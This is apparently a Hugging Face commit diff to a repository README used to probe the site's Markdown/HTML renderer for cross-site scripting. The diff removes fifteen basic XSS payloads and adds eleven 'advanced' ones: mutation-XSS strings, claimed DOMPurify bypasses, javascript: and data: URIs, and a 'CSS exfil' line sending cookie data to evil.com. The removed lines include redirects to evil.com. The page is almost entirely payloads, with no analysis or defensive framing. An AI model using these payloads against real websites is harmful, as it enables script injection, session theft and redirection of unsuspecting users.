Hugging Face's logo

FIRSTACCOUNT69
/
xss-test-s15

English
Model card Files
xet
Community
1
FIRSTACCOUNT69 commited on
Commit
576f2dd
·
verified ·
1 Parent(s): ad75efa

Update

Browse files
Files changed (1) hide show
  1. README.md +27 -36
README.md CHANGED
@@ -2,50 +2,41 @@
2
  language: en
3
  license: mit
4
  ---
 
5
 
6
- # XSS Test
 
7
 
8
- ## Test 1: Basic script
9
- <script>alert(1)</script>
10
 
11
- ## Test 2: SVG onload
12
- <svg onload="alert(2)">
13
 
14
- ## Test 3: IMG onerror
15
- <img src=x onerror="alert(3)">
16
 
17
- ## Test 4: Details/summary
18
- <details open ontoggle="alert(4)"><summary>Click</summary>test</details>
19
 
20
- ## Test 5: Math/annotation
21
- <math><mtext><table><mglyph><style><!--</style><img src=x onerror="alert(5)">
 
22
 
23
- ## Test 6: iframe srcdoc
24
- <iframe srcdoc="<script>alert(6)</script>">
25
 
26
- ## Test 7: Object data
27
- <object data="javascript:alert(7)">
 
28
 
29
- ## Test 8: A href javascript
30
- [Click me](javascript:alert(8))
31
 
32
- ## Test 9: Markdown image with event handler
33
- ![test](https://x" onerror="alert(9))
 
34
 
35
- ## Test 10: HTML entity encoding
36
- <img src=x onerror=&#97;&#108;&#101;&#114;&#116;(10)>
37
-
38
- ## Test 11: Custom element
39
- <custom-element onfocus="alert(11)" autofocus tabindex=0>
40
-
41
- ## Test 12: Link with target
42
- <a href="https://evil.com" target="_top">test</a>
43
-
44
- ## Test 13: Base tag
45
- <base href="https://evil.com">
46
-
47
- ## Test 14: Meta refresh
48
- <meta http-equiv="refresh" content="0;url=https://evil.com">
49
-
50
- ## Test 15: Form action
51
- <form action="https://evil.com"><input type="submit" value="Submit"></form>
 
2
  language: en
3
  license: mit
4
  ---
5
+ # Advanced XSS
6
 
7
+ ## T1: mXSS via noscript
8
+ <noscript><p title="</noscript><img src=x onerror=alert(1)>">
9
 
10
+ ## T2: mXSS via math
11
+ <math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(2)>
12
 
13
+ ## T3: mXSS via svg/foreignObject
14
+ <svg><foreignObject><div><style><!--</style><img src=x onerror=alert(3)></div></foreignObject></svg>
15
 
16
+ ## T4: DOMPurify bypass via namespace confusion
17
+ <svg><a><rect width="100" height="100"/><animate attributeName="href" values="javascript:alert(4)"/></a></svg>
18
 
19
+ ## T5: DOMPurify bypass via use
20
+ <svg><use href="data:image/svg+xml,<svg id=x xmlns=http://www.w3.org/2000/svg><image href=1 onerror=alert(5) /></svg>#x" />
21
 
22
+ ## T6: CSS injection
23
+ <p style="background:url(javascript:alert(6))">test</p>
24
+ <p style="background-image:url(https://evil.com/track?cookie=)">CSS exfil</p>
25
 
26
+ ## T7: Custom protocol handler
27
+ <a href="hf://models/test">HF Protocol</a>
28
 
29
+ ## T8: Form with formaction
30
+ <button formaction="javascript:alert(8)">test</button>
31
+ <input type="image" src=x onerror="alert(8)">
32
 
33
+ ## T9: Anchor with data URI
34
+ <a href="data:text/html,<script>alert(9)</script>">Click</a>
35
 
36
+ ## T10: Template literal
37
+ <template><script>alert(10)</script></template>
38
+ <xmp><script>alert(10)</script></xmp>
39
 
40
+ ## T11: Markdown link tricks
41
+ [test](https://evil.com "onclick=alert(11)")
42
+ [test](https://evil.com" onclick="alert(11))